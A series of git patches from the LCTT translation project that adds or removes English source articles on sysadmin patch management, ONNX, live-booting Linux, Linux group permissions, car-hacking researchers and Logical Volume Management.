unpatched. + +The faster and easier patch management is, the more likely you are to do it. You should have a system in place that quickly can tell you which servers are running a particular piece of software at which version. Ideally, that system also can push out updates. Personally, I prefer orchestration tools like MCollective for this task, but Red Hat provides Satellite, and Canonical provides Landscape as central tools that let you view software versions across your fleet of servers and apply patches all from a central place. + +Patching should be fault-tolerant as well. You should be able to patch a service and restart it without any overall down time. The same idea goes for kernel patches that require a reboot. My approach is to divide my servers into different high availability groups so that lb1, app1, rabbitmq1 and db1 would all be in one group, and lb2, app2, rabbitmq2 and db2 are in another. Then, I know I can patch one group at a time without it causing downtime anywhere else. + +So, how fast is fast? Your system should be able to roll out a patch to a minor piece of software that doesn't have an accompanying service (such as bash in the case of the ShellShock vulnerability) within a few minutes to an hour at most. For something like OpenSSL that requires you to restart services, the careful process of patching and restarting services in a fault-tolerant way probably will take more time, but this is where orchestration tools come in handy. I gave examples of how to use MCollective to accomplish this in my recent MCollective articles (see the December 2016 and January 2017 issues), but ideally, you should put a system in place that makes it easy to patch and restart services in a fault-tolerant and automated way. + +When patching requires a reboot, such as in the case of kernel patches, it might take a bit more time, but again, automation and orchestration tools can make this go much faster than you might imagine. I can patch and reboot the servers in an environment in a fault-tolerant way within an hour or two, and it would be much faster than that if I didn't need to wait for clusters to sync back up in between reboots. + +Unfortunately, many sysadmins still hold on to the outdated notion that uptime is a badge of pride—given that serious kernel patches tend to come out at least once a year if not more often, to me, it's proof you don't take security seriously. + +Many organizations also still have that single point of failure server that can never go down, and as a result, it never gets patched or rebooted. If you want to be secure, you need to remove these outdated liabilities and create systems that at least can be rebooted during a late-night maintenance window. + +Ultimately, fast and easy patch management is a sign of a mature and professional sysadmin team. Updating software is something all sysadmins have to do as part of their jobs, and investing time into systems that make that process easy and fast pays dividends far beyond security. For one, it helps identify bad architecture decisions that cause single points of failure. For another, it helps identify stagnant, out-of-date legacy systems in an environment and provides you with an incentive to replace them. Finally, when patching is managed well, it frees up sysadmins' time and turns their attention to the things that truly require their expertise. + +______________________ + +Kyle Rankin is senior security and infrastructure architect, the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu Server Book, and a columnist for Linux Journal. Follow him @kylerankin + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/sysadmin-101-patch-management + +作者:[Kyle Rankin ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/kyle-rankin +[1]:https://www.linuxjournal.com/tag/how-tos +[2]:https://www.linuxjournal.com/tag/servers +[3]:https://www.linuxjournal.com/tag/sysadmin +[4]:https://www.linuxjournal.com/users/kyle-rankin From 8dfd8a3a65a431c652555b7e16b20552050831bc Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:42:04 +0800 Subject: [PATCH 0191/1627] =?UTF-8?q?20171203-26=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Help Build ONNX Open Source AI Platform.md | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md new file mode 100644 index 0000000000..c09d66bc57 --- /dev/null +++ b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -0,0 +1,76 @@ +AWS to Help Build ONNX Open Source AI Platform +============================================================ +![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) + + +Amazon Web Services has become the latest tech firm to join the deep learning community's collaboration on the Open Neural Network Exchange, recently launched to advance artificial intelligence in a frictionless and interoperable environment. Facebook and Microsoft led the effort. + +As part of that collaboration, AWS made its open source Python package, ONNX-MxNet, available as a deep learning framework that offers application programming interfaces across multiple languages including Python, Scala and open source statistics software R. + +The ONNX format will help developers build and train models for other frameworks, including PyTorch, Microsoft Cognitive Toolkit or Caffe2, AWS Deep Learning Engineering Manager Hagay Lupesko and Software Developer Roshani Nagmote wrote in an online post last week. It will let developers import those models into MXNet, and run them for inference. + +### Help for Developers + +Facebook and Microsoft this summer launched ONNX to support a shared model of interoperability for the advancement of AI. Microsoft committed its Cognitive Toolkit, Caffe2 and PyTorch to support ONNX. + +Cognitive Toolkit and other frameworks make it easier for developers to construct and run computational graphs that represent neural networks, Microsoft said. + +Initial versions of [ONNX code and documentation][4] were made available on Github. + +AWS and Microsoft last month announced plans for Gluon, a new interface in Apache MXNet that allows developers to build and train deep learning models. + +Gluon "is an extension of their partnership where they are trying to compete with Google's Tensorflow," observed Aditya Kaul, research director at [Tractica][5]. + +"Google's omission from this is quite telling but also speaks to their dominance in the market," he told LinuxInsider. + +"Even Tensorflow is open source, and so open source is not the big catch here -- but the rest of the ecosystem teaming up to compete with Google is what this boils down to," Kaul said. + +The Apache MXNet community earlier this month introduced version 0.12 of MXNet, which extends Gluon functionality to allow for new, cutting-edge research, according to AWS. Among its new features are variational dropout, which allows developers to apply the dropout technique for mitigating overfitting to recurrent neural networks. + +Convolutional RNN, Long Short-Term Memory and gated recurrent unit cells allow datasets to be modeled using time-based sequence and spatial dimensions, AWS noted. + +### Framework-Neutral Method + +"This looks like a great way to deliver inference regardless of which framework generated a model," said Paul Teich, principal analyst at [Tirias Research][6]. + +"This is basically a framework-neutral way to deliver inference," he told LinuxInsider. + +Cloud providers like AWS, Microsoft and others are under pressure from customers to be able to train on one network while delivering on another, in order to advance AI, Teich pointed out. + +"I see this as kind of a baseline way for these vendors to check the interoperability box," he remarked. + +"Framework interoperability is a good thing, and this will only help developers in making sure that models that they build on MXNet or Caffe or CNTK are interoperable," Tractica's Kaul pointed out. + +As to how this interoperability might apply in the real world, Teich noted that technologies such as natural language translation or speech recognition would require that Alexa's voice recognition technology be packaged and delivered to another developer's embedded environment. + +### Thanks, Open Source + +"Despite their competitive differences, these companies all recognize they owe a significant amount of their success to the software development advancements generated by the open source movement," said Jeff Kaplan, managing director of [ThinkStrategies][7]. + +"The Open Neural Network Exchange is committed to producing similar benefits and innovations in AI," he told LinuxInsider. + +A growing number of major technology companies have announced plans to use open source to speed the development of AI collaboration, in order to create more uniform platforms for development and research. + +AT&T just a few weeks ago announced plans [to launch the Acumos Project][8] with TechMahindra and The Linux Foundation. The platform is designed to open up efforts for collaboration in telecommunications, media and technology.  +![](https://www.ectnews.com/images/end-enn.gif) + +-------------------------------------------------------------------------------- + +via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html + +作者:[ David Jones ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html#searchbyline +[1]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html# +[2]:https://www.linuxinsider.com/perl/mailit/?id=84971 +[3]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html +[4]:https://github.com/onnx/onnx +[5]:https://www.tractica.com/ +[6]:http://www.tiriasresearch.com/ +[7]:http://www.thinkstrategies.com/ +[8]:https://www.linuxinsider.com/story/84926.html +[9]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html From becb59ff7b40ceddf6c0c949565492df2ddc43a1 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:43:35 +0800 Subject: [PATCH 0192/1627] =?UTF-8?q?20171203-28=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171114 Take Linux and Run With It.md | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 sources/tech/20171114 Take Linux and Run With It.md diff --git a/sources/tech/20171114 Take Linux and Run With It.md b/sources/tech/20171114 Take Linux and Run With It.md new file mode 100644 index 0000000000..b7b6cb9663 --- /dev/null +++ b/sources/tech/20171114 Take Linux and Run With It.md @@ -0,0 +1,68 @@ +Take Linux and Run With It +============================================================ + +![](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2016-linux-1.jpg) + +![](https://www.linuxinsider.com/images/2015/image-credit-adobe-stock_130x15.gif) + + +"How do you run an operating system?" may seem like a simple question, since most of us are accustomed to turning on our computers and seeing our system spin up. However, this common model is only one way of running an operating system. As one of Linux's greatest strengths is versatility, Linux offers the most methods and environments for running it. + +To unleash the full power of Linux, and maybe even find a use for it you hadn't thought of, consider some less conventional ways of running it -- specifically, ones that don't even require installation on a computer's hard drive. + +### We'll Do It Live! + +Live-booting is a surprisingly useful and popular way to get the full Linux experience on the fly. While hard drives are where OSes reside most of the time, they actually can be installed to most major storage media, including CDs, DVDs and USB flash drives. + +When an OS is installed to some device other than a computer's onboard hard drive and subsequently booted instead of that onboard drive, it's called "live-booting" or running a "live session." + +At boot time, the user simply selects an external storage source for the hardware to look for boot information. If found, the computer follows the external device's boot instructions, essentially ignoring the onboard drive until the next time the user boots normally. Optical media are increasingly rare these days, so by far the most typical form that an external OS-carrying device takes is a USB stick. + +Most mainstream Linux distributions offer a way to run a live session as a way of trying them out. The live session doesn't save any user activity, and the OS resets to the clean default state after every shutdown. + +Live Linux sessions can be used for more than testing a distro, though. One application is for executing system repair for critically malfunctioning onboard (usually also Linux) systems. If an update or configuration made the onboard system unbootable, a full system backup is required, or the hard drive has sustained serious file corruption, the only recourse is to start up a live system and perform maintenance on the onboard drive. + +In these and similar scenarios, the onboard drive cannot be manipulated or corrected while also keeping the system stored on it running, so a live system takes on those burdens instead, leaving all but the problematic files on the onboard drive at rest. + +Live sessions also are perfectly suited for handling sensitive information. If you don't want a computer to retain any trace of the operations executed or information handled on it, especially if you are using hardware you can't vouch for -- like a public library or hotel business center computer -- a live session will provide you all the desktop computing functions to complete your task while retaining no trace of your session once you're finished. This is great for doing online banking or password input that you don't want a computer to remember. + +### Linux Virtually Anywhere + +Another approach for implementing Linux for more on-demand purposes is to run a virtual machine on another host OS. A virtual machine, or VM, is essentially a small computer running inside another computer and contained in a single large file. + +To run a VM, users simply install a hypervisor program (a kind of launcher for the VM), select a downloaded Linux OS image file (usually ending with a ".iso" file extension), and walk through the setup process. + +Most of the settings can be left at their defaults, but the key ones to configure are the amount of RAM and hard drive storage to lease to the VM. Fortunately, since Linux has a light footprint, you don't have to set these very high: 2 GB of RAM and 16 GB of storage should be plenty for the VM while still letting your host OS thrive. + +So what does this offer that a live system doesn't? First, whereas live systems are ephemeral, VMs can retain the data stored on them. This is great if you want to set up your Linux VM for a special use case, like software development or even security. + +When used for development, a Linux VM gives you the solid foundation of Linux's programming language suites and coding tools, and it lets you save your projects right in the VM to keep everything organized. + +If security is your goal, Linux VMs allow you to impose an extra layer between a potential hazard and your system. If you do your browsing from the VM, a malicious program would have to compromise not only your virtual Linux system, but also the hypervisor -- and  _then_ your host OS, a technical feat beyond all but the most skilled and determined adversaries. + +Second, you can start up your VM on demand from your host system, without having to power it down and start it up again as you would have to with a live session. When you need it, you can quickly bring up the VM, and when you're finished, you just shut it down and go back to what you were doing before. + +Your host system continues running normally while the VM is on, so you can attend to tasks simultaneously in each system. + +### Look Ma, No Installation! + +Just as there is no one form that Linux takes, there's also no one way to run it. Hopefully, this brief primer on the kinds of systems you can run has given you some ideas to expand your use models. + +The best part is that if you're not sure how these can help, live booting and virtual machines don't hurt to try!  +![](https://www.ectnews.com/images/end-enn.gif) + +-------------------------------------------------------------------------------- + +via: https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html + +作者:[ Jonathan Terrasi ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html#searchbyline +[1]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html# +[2]:https://www.linuxinsider.com/perl/mailit/?id=84951 +[3]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html +[4]:https://www.linuxinsider.com/story/Take-Linux-and-Run-With-It-84951.html From c91f7e0c107e1e7638285bb4687c2f193699c7fe Mon Sep 17 00:00:00 2001 From: qhwdw Date: Sun, 3 Dec 2017 20:44:35 +0800 Subject: [PATCH 0193/1627] modified by qhwdw --- core.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core.md b/core.md index da45c009fc..3093f4ae52 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2016/12/24 \ No newline at end of file +2017/12/24 From 5c74048e32e9b5b426fec5f80b6d23a4f5741a04 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Sun, 3 Dec 2017 20:47:57 +0800 Subject: [PATCH 0194/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=97=A5=E6=9C=9F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- core.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core.md b/core.md index 3093f4ae52..2ec8aa89cf 100644 --- a/core.md +++ b/core.md @@ -36,4 +36,4 @@ - 除非必要,合并 PR 时不要 squash-merge wxy@LCTT -2017/12/24 +2016/12/24 From 653b2555c65721c0bbaa86a6f50117345ea397ab Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:48:59 +0800 Subject: [PATCH 0195/1627] Delete 20171203 How do groups work on Linux.md --- .../20171203 How do groups work on Linux.md | 141 ------------------ 1 file changed, 141 deletions(-) delete mode 100644 sources/tech/20171203 How do groups work on Linux.md diff --git a/sources/tech/20171203 How do groups work on Linux.md b/sources/tech/20171203 How do groups work on Linux.md deleted file mode 100644 index 503f83d1d9..0000000000 --- a/sources/tech/20171203 How do groups work on Linux.md +++ /dev/null @@ -1,141 +0,0 @@ -How do groups work on Linux? -============================================================ - -Hello! Last week, I thought I knew how users and groups worked on Linux. Here is what I thought: - -1. Every process belongs to a user (like `julia`) - -2. When a process tries to read a file owned by a group, Linux a) checks if the user `julia` can access the file, and b) checks which groups `julia` belongs to, and whether any of those groups owns & can access that file - -3. If either of those is true (or if the ‘any’ bits are set right) then the process can access the file - -So, for example, if a process is owned by the `julia` user and `julia` is in the `awesome`group, then the process would be allowed to read this file. - -``` -r--r--r-- 1 root awesome 6872 Sep 24 11:09 file.txt - -``` - -I had not thought carefully about this, but if pressed I would have said that it probably checks the `/etc/group` file at runtime to see what groups you’re in. - -### that is not how groups work - -I found out at work last week that, no, what I describe above is not how groups work. In particular Linux does **not** check which groups a process’s user belongs to every time that process tries to access a file. - -Here is how groups actually work! I learned this by reading Chapter 9 (“Process Credentials”) of [The Linux Programming Interface][1] which is an incredible book. As soon as I realized that I did not understand how users and groups worked, I opened up the table of contents with absolute confidence that it would tell me what’s up, and I was right. - -### how users and groups checks are done - -They key new insight for me was pretty simple! The chapter starts out by saying that user and group IDs are **attributes of the process**: - -* real user ID and group ID; - -* effective user ID and group ID; - -* saved set-user-ID and saved set-group-ID; - -* file-system user ID and group ID (Linux-specific); and - -* supplementary group IDs. - -This means that the way Linux **actually** does group checks to see a process can read a file is: - -* look at the process’s group IDs & supplementary group IDs (from the attributes on the process, **not** by looking them up in `/etc/group`) - -* look at the group on the file - -* see if they match - -Generally when doing access control checks it uses the **effective** user/group ID, not the real user/group ID. Technically when accessing a file it actually uses the **file-system** ids but those are usually the same as the effective uid/gid. - -### Adding a user to a group doesn’t put existing processes in that group - -Here’s another fun example that follows from this: if I create a new `panda` group and add myself (bork) to it, then run `groups` to check my group memberships – I’m not in the panda group! - -``` -bork@kiwi~> sudo addgroup panda -Adding group `panda' (GID 1001) ... -Done. -bork@kiwi~> sudo adduser bork panda -Adding user `bork' to group `panda' ... -Adding user bork to group panda -Done. -bork@kiwi~> groups -bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd - -``` - -no `panda` in that list! To double check, let’s try making a file owned by the `panda`group and see if I can access it: - -``` -$ touch panda-file.txt -$ sudo chown root:panda panda-file.txt -$ sudo chmod 660 panda-file.txt -$ cat panda-file.txt -cat: panda-file.txt: Permission denied - -``` - -Sure enough, I can’t access `panda-file.txt`. No big surprise there. My shell didn’t have the `panda` group as a supplementary GID before, and running `adduser bork panda` didn’t do anything to change that. - -### how do you get your groups in the first place? - -So this raises kind of a confusing question, right – if processes have groups baked into them, how do you get assigned your groups in the first place? Obviously you can’t assign yourself more groups (that would defeat the purpose of access control). - -It’s relatively clear how processes I **execute** from my shell (bash/fish) get their groups – my shell runs as me, and it has a bunch of group IDs on it. Processes I execute from my shell are forked from the shell so they get the same groups as the shell had. - -So there needs to be some “first” process that has your groups set on it, and all the other processes you set inherit their groups from that. That process is called your **login shell**and it’s run by the `login` program (`/bin/login`) on my laptop. `login` runs as root and calls a C function called `initgroups` to set up your groups (by reading `/etc/group`). It’s allowed to set up your groups because it runs as root. - -### let’s try logging in again! - -So! Let’s say I am running in a shell, and I want to refresh my groups! From what we’ve learned about how groups are initialized, I should be able to run `login` to refresh my groups and start a new login shell! - -Let’s try it: - -``` -$ sudo login bork -$ groups -bork adm cdrom sudo dip plugdev lpadmin sambashare docker lxd panda -$ cat panda-file.txt # it works! I can access the file owned by `panda` now! - -``` - -Sure enough, it works! Now the new shell that `login` spawned is part of the `panda`group! Awesome! This won’t affect any other shells I already have running. If I really want the new `panda` group everywhere, I need to restart my login session completely, which means quitting my window manager and logging in again. - -### newgrp - -Somebody on Twitter told me that if you want to start a new shell with a new group that you’ve been added to, you can use `newgrp`. Like this: - -``` -sudo addgroup panda -sudo adduser bork panda -newgrp panda # starts a new shell, and you don't have to be root to run it! - -``` - -You can accomplish the same(ish) thing with `sg panda bash` which will start a `bash`shell that runs with the `panda` group. - -### setuid sets the effective user ID - -I’ve also always been a little vague about what it means for a process to run as “setuid root”. It turns out that setuid sets the effective user ID! So if I (`julia`) run a setuid root process (like `passwd`), then the **real** user ID will be set to `julia`, and the **effective** user ID will be set to `root`. - -`passwd` needs to run as root, but it can look at its real user ID to see that `julia` started the process, and prevent `julia` from editing any passwords except for `julia`’s password. - -### that’s all! - -There are a bunch more details about all the edge cases and exactly how everything works in The Linux Programming Interface so I will not get into all the details here. That book is amazing. Everything I talked about in this post is from Chapter 9, which is a 17-page chapter inside a 1300-page book. - -The thing I love most about that book is that reading 17 pages about how users and groups work is really approachable, self-contained, super useful, and I don’t have to tackle all 1300 pages of it at once to learn helpful things :) - --------------------------------------------------------------------------------- - -via: https://jvns.ca/blog/2017/11/20/groups/ - -作者:[Julia Evans ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://jvns.ca/about -[1]:http://man7.org/tlpi/ From 87471aa3864d90add9343042cc589f16bd3185e1 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 20:57:51 +0800 Subject: [PATCH 0196/1627] =?UTF-8?q?20171203-29=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...es Are Hiring Computer Security Experts.md | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md new file mode 100644 index 0000000000..4a7d23e5f0 --- /dev/null +++ b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md @@ -0,0 +1,91 @@ +Why Car Companies Are Hiring Computer Security Experts +============================================================ + +Photo +![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) +The cybersecurity experts Marc Rogers, left, of CloudFlare and Kevin Mahaffey of Lookout were able to control various Tesla functions from their physically connected laptop. They pose in CloudFlare’s lobby in front of Lava Lamps used to generate numbers for encryption.CreditChristie Hemm Klok for The New York Times + +It started about seven years ago. Iran’s top nuclear scientists were being assassinated in a string of similar attacks: Assailants on motorcycles were pulling up to their moving cars, attaching magnetic bombs and detonating them after the motorcyclists had fled the scene. + +In another seven years, security experts warn, assassins won’t need motorcycles or magnetic bombs. All they’ll need is a laptop and code to send driverless cars careering off a bridge, colliding with a driverless truck or coming to an unexpected stop in the middle of fast-moving traffic. + +Automakers may call them self-driving cars. But hackers call them computers that travel over 100 miles an hour. + +“These are no longer cars,” said Marc Rogers, the principal security researcher at the cybersecurity firm CloudFlare. “These are data centers on wheels. Any part of the car that talks to the outside world is a potential inroad for attackers.” + +Those fears came into focus two years ago when two “white hat” hackers — researchers who look for computer vulnerabilities to spot problems and fix them, rather than to commit a crime or cause problems — successfully gained access to a Jeep Cherokee from their computer miles away. They rendered their crash-test dummy (in this case a nervous reporter) powerless over his vehicle and disabling his transmission in the middle of a highway. + +The hackers, Chris Valasek and Charlie Miller (now security researchers respectively at Uber and Didi, an Uber competitor in China), discovered an [electronic route from the Jeep’s entertainment system to its dashboard][10]. From there, they had control of the vehicle’s steering, brakes and transmission — everything they needed to paralyze their crash test dummy in the middle of a highway. + +“Car hacking makes great headlines, but remember: No one has ever had their car hacked by a bad guy,” Mr. Miller wrote on Twitter last Sunday. “It’s only ever been performed by researchers.” + +Still, the research by Mr. Miller and Mr. Valasek came at a steep price for Jeep’s manufacturer, Fiat Chrysler, which was forced to recall 1.4 million of its vehicles as a result of the hacking experiment. + +It is no wonder that Mary Barra, the chief executive of General Motors, called cybersecurity her company’s top priority last year. Now the skills of researchers and so-called white hat hackers are in high demand among automakers and tech companies pushing ahead with driverless car projects. + +Uber, [Tesla][11], Apple and Didi in China have been actively recruiting white hat hackers like Mr. Miller and Mr. Valasek from one another as well as from traditional cybersecurity firms and academia. + +Last year, Tesla poached Aaron Sigel, Apple’s manager of security for its iOS operating system. Uber poached Chris Gates, formerly a white hat hacker at Facebook. Didi poached Mr. Miller from Uber, where he had gone to work after the Jeep hack. And security firms have seen dozens of engineers leave their ranks for autonomous-car projects. + +Mr. Miller said he left Uber for Didi, in part, because his new Chinese employer has given him more freedom to discuss his work. + +“Carmakers seem to be taking the threat of cyberattack more seriously, but I’d still like to see more transparency from them,” Mr. Miller wrote on Twitter on Saturday. + +Like a number of big tech companies, Tesla and Fiat Chrysler started paying out rewards to hackers who turn over flaws the hackers discover in their systems. GM has done something similar, though critics say GM’s program is limited when compared with the ones offered by tech companies, and so far no rewards have been paid out. + +One year after the Jeep hack by Mr. Miller and Mr. Valasek, they demonstrated all the other ways they could mess with a Jeep driver, including hijacking the vehicle’s cruise control, swerving the steering wheel 180 degrees or slamming on the parking brake in high-speed traffic — all from a computer in the back of the car. (Those exploits ended with their test Jeep in a ditch and calls to a local tow company.) + +Granted, they had to be in the Jeep to make all that happen. But it was evidence of what is possible. + +The Jeep penetration was preceded by a [2011 hack by security researchers at the University of Washington][12] and the University of California, San Diego, who were the first to remotely hack a sedan and ultimately control its brakes via Bluetooth. The researchers warned car companies that the more connected cars become, the more likely they are to get hacked. + +Security researchers have also had their way with Tesla’s software-heavy Model S car. In 2015, Mr. Rogers, together with Kevin Mahaffey, the chief technology officer of the cybersecurity company Lookout, found a way to control various Tesla functions from their physically connected laptop. + +One year later, a team of Chinese researchers at Tencent took their research a step further, hacking a moving Tesla Model S and controlling its brakes from 12 miles away. Unlike Chrysler, Tesla was able to dispatch a remote patch to fix the security holes that made the hacks possible. + +In all the cases, the car hacks were the work of well meaning, white hat security researchers. But the lesson for all automakers was clear. + +The motivations to hack vehicles are limitless. When it learned of Mr. Rogers’s and Mr. Mahaffey’s investigation into Tesla’s Model S, a Chinese app-maker asked Mr. Rogers if he would be interested in sharing, or possibly selling, his discovery, he said. (The app maker was looking for a backdoor to secretly install its app on Tesla’s dashboard.) + +Criminals have not yet shown they have found back doors into connected vehicles, though for years, they have been actively developing, trading and deploying tools that can intercept car key communications. + +But as more driverless and semiautonomous cars hit the open roads, they will become a more worthy target. Security experts warn that driverless cars present a far more complex, intriguing and vulnerable “attack surface” for hackers. Each new “connected” car feature introduces greater complexity, and with complexity inevitably comes vulnerability. + +Twenty years ago, cars had, on average, one million lines of code. The General Motors 2010 [Chevrolet Volt][13] had about 10 million lines of code — more than an [F-35 fighter jet][14]. + +Today, an average car has more than 100 million lines of code. Automakers predict it won’t be long before they have 200 million. When you stop to consider that, on average, there are 15 to 50 defects per 1,000 lines of software code, the potentially exploitable weaknesses add up quickly. + +The only difference between computer code and driverless car code is that, “Unlike data center enterprise security — where the biggest threat is loss of data — in automotive security, it’s loss of life,” said David Barzilai, a co-founder of Karamba Security, an Israeli start-up that is working on addressing automotive security. + +To truly secure autonomous vehicles, security experts say, automakers will have to address the inevitable vulnerabilities that pop up in new sensors and car computers, address inherent vulnerabilities in the base car itself and, perhaps most challenging of all, bridge the cultural divide between automakers and software companies. + +“The genie is out of the bottle, and to solve this problem will require a major cultural shift,” said Mr. Mahaffey of the cybersecurity company Lookout. “And an automaker that truly values cybersecurity will treat security vulnerabilities the same they would an airbag recall. We have not seen that industrywide shift yet.” + +There will be winners and losers, Mr. Mahaffey added: “Automakers that transform themselves into software companies will win. Others will get left behind.” + +-------------------------------------------------------------------------------- + +via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html + +作者:[NICOLE PERLROTH ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.nytimes.com/by/nicole-perlroth +[1]:https://www.nytimes.com/2016/06/09/technology/software-as-weaponry-in-a-computer-connected-world.html +[2]:https://www.nytimes.com/2015/08/29/technology/uber-hires-two-engineers-who-showed-cars-could-be-hacked.html +[3]:https://www.nytimes.com/2015/08/11/opinion/zeynep-tufekci-why-smart-objects-may-be-a-dumb-idea.html +[4]:https://www.nytimes.com/by/nicole-perlroth +[5]:https://www.nytimes.com/column/bits +[6]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-1 +[7]:http://www.nytimes.com/newsletters/sample/bits?pgtype=subscriptionspage&version=business&contentId=TU&eventName=sample&module=newsletter-sign-up +[8]:https://www.nytimes.com/privacy +[9]:https://www.nytimes.com/help/index.html +[10]:https://bits.blogs.nytimes.com/2015/07/21/security-researchers-find-a-way-to-hack-cars/ +[11]:http://www.nytimes.com/topic/company/tesla-motors-inc?inline=nyt-org +[12]:http://www.autosec.org/pubs/cars-usenixsec2011.pdf +[13]:http://autos.nytimes.com/2011/Chevrolet/Volt/238/4117/329463/researchOverview.aspx?inline=nyt-classifier +[14]:http://topics.nytimes.com/top/reference/timestopics/subjects/m/military_aircraft/f35_airplane/index.html?inline=nyt-classifier +[15]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-3 From 5fa73ba41a012805bdae5de5a9cfae29c560cc79 Mon Sep 17 00:00:00 2001 From: xu0o0 Date: Sun, 3 Dec 2017 21:01:07 +0800 Subject: [PATCH 0197/1627] translating by @haoqixu --- sources/tech/20171114 Sysadmin 101 Patch Management.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171114 Sysadmin 101 Patch Management.md b/sources/tech/20171114 Sysadmin 101 Patch Management.md index 71df51258d..55ca09da87 100644 --- a/sources/tech/20171114 Sysadmin 101 Patch Management.md +++ b/sources/tech/20171114 Sysadmin 101 Patch Management.md @@ -1,4 +1,4 @@ -Sysadmin 101: Patch Management +【翻译中 @haoqixu】Sysadmin 101: Patch Management ============================================================ * [HOW-TOs][1] From 64bfa5c3a61a92629bcb53fedf062d2572bcd9c8 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 21:01:46 +0800 Subject: [PATCH 0198/1627] =?UTF-8?q?20171203-30=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...sers guide to Logical Volume Management.md | 233 ++++++++++++++++++ 1 file changed, 233 insertions(+) create mode 100644 sources/tech/20160922 A Linux users guide to Logical Volume Management.md diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md new file mode 100644 index 0000000000..ff0e390f38 --- /dev/null +++ b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -0,0 +1,233 @@ +A Linux user's guide to Logical Volume Management +============================================================ + +![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") +Image by : opensource.com + 